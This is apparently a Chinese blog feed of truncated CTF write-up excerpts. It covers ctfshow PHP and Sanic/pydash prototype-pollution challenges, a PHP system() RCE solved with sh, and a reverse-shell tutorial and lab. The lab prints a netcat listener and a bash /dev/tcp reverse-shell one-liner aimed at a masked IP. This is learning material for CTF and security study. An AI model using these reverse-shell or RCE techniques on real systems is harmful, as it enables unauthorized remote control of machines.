ctfshow摆烂杯复现
一行代码<?php/*\# -*- coding: utf-8 -*-\# @Author: h1xa\# @Date: 2021-11-18 21:25:22\# @Last Modified by: h1xa\# @Last Modified time: 2021-11-18 22:14:12\# @email: h1xa@ctfer.com\# @link: https://ctfer.com*/echo !(!(include "flag.php")||(!error_reporting(0))||stripos($_GET['filename'],'.')||($_GET['id']!=0)||(strlen($_GET['content'])<=7)||(!eregi("ctfsho".substr($_GET['content'],0,1),"ctfshow"))||substr($_GET[ ...
Sanic's revenge(复现)
复现这个之前先要学习下python的原型链污染(未学┭┮﹏┭┮)
之前学了Nodejs原型链污染,Python原型链污染和Nodejs原型链污染的根本原理一样,Nodejs是对键值对的控制来进行污染,而Python则是对类属性值的污染,且只能对类的属性来进行污染不能够污染类的方法。
先看给的源码
from sanic import Sanic import os from sanic.response import text, html import sys import random import pydash # pydash==5.1.2 # 这里的源码好像被admin删掉了一些,听他说里面藏有大秘密 class Pollute: def __init__(self): pass app = Sanic(__name__) app.static("/static/", "./static/") @app.route("/*****secret********") asy ...
ctfshow原谅杯
原谅4源码
<?php isset($_GET['xbx'])?system($_GET['xbx']):highlight_file(__FILE__);
发现xbx可以rce
ls 发现
index.php yuanliang_4_xxx.zip
并且flag在/目录里面
直接cat发现不行
我们ls /bin目录
/bin 目录是 Unix/Linux 系统中的一个重要目录,它存放着许多常用的可执行文件(二进制文件)。这些文件通常是系统管理员或普通用户经常使用的基本命令和应用程序
最终发现sh rm ls 这三个命令可以执行
sh是一个轻量级的shell,相比于bash等更高级的shell,它提供了更基础的功能。但它仍然是许多系统管理任务的首选shell。
明显让我们用sh来做题目
sh也可以像cat一样读取文件内容但是有一点不同
[root@iZbp1g5j7wkdznqpfv918wZ ctf]# cat Gu0f3n.txtGu0f3n[root@iZbp1g5j7wkdznqpfv918wZ ctf] ...
ciscn2024的一些反思
什么是反弹shellreverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
正向连接
就是我们客户端连服务器
我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接
反向连接
就是让服务器连我们
一般适用于
目标机因防火墙受限,目标机器只能发送请求,不能接收请求。
目标机端口被占用。
目标机位于局域网,或IP会动态变化,攻击机无法直接连接。
对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知的
向web里面的话有可能出现在rce当中过滤的函数实在太多,我们只能去实现反向连shell
常见的方式
Bash反弹shell
首先我们先了解下Linux的连接符号和重定向
什么是重定向:
Linux中的重定向就是将原本要输出到屏幕中的数据信息,重新指向某个特定文件当中,或者定向到黑洞文件(/dev/null)中。 ...
反弹shell的实验
反弹shell实验之前国赛ciscn2024坐牢
web题目简直难如登天
但是还是有大佬把题目做出来了,而且用的技术非常高端反弹shell
今天终于抽出时间来做这个反弹shell的实验
首先我们先自己搭建一个自己的服务器(以后自己做题目也得用)这里我用的阿里云,因为它可以试用
网址https://developer.aliyun.com/
这里反弹shell的原理之前讲过了,这里就不讲了
搭建好服务器
第一步先设置服务器,这里需要开放一个端口用来反弹shell,我这里用的7777端口
后续我们也会用这个端口复现下国赛的题目
然后我们用自己的shell来连上我们的服务器
刚连上服务器需要自己下载nc
我们用自己的服务器作为攻击端
用我的kali作为被攻击端
在服务器上
nc -lvvp 7777//监听7777端口
然后在kali上
bash -i >& /dev/tcp/8.xxx.xxx.xxx/7777 0>&1
成功连接上
做这个实验也是花了一些时间
当时没想到服务器要自己去打开端口
没关系成功了就行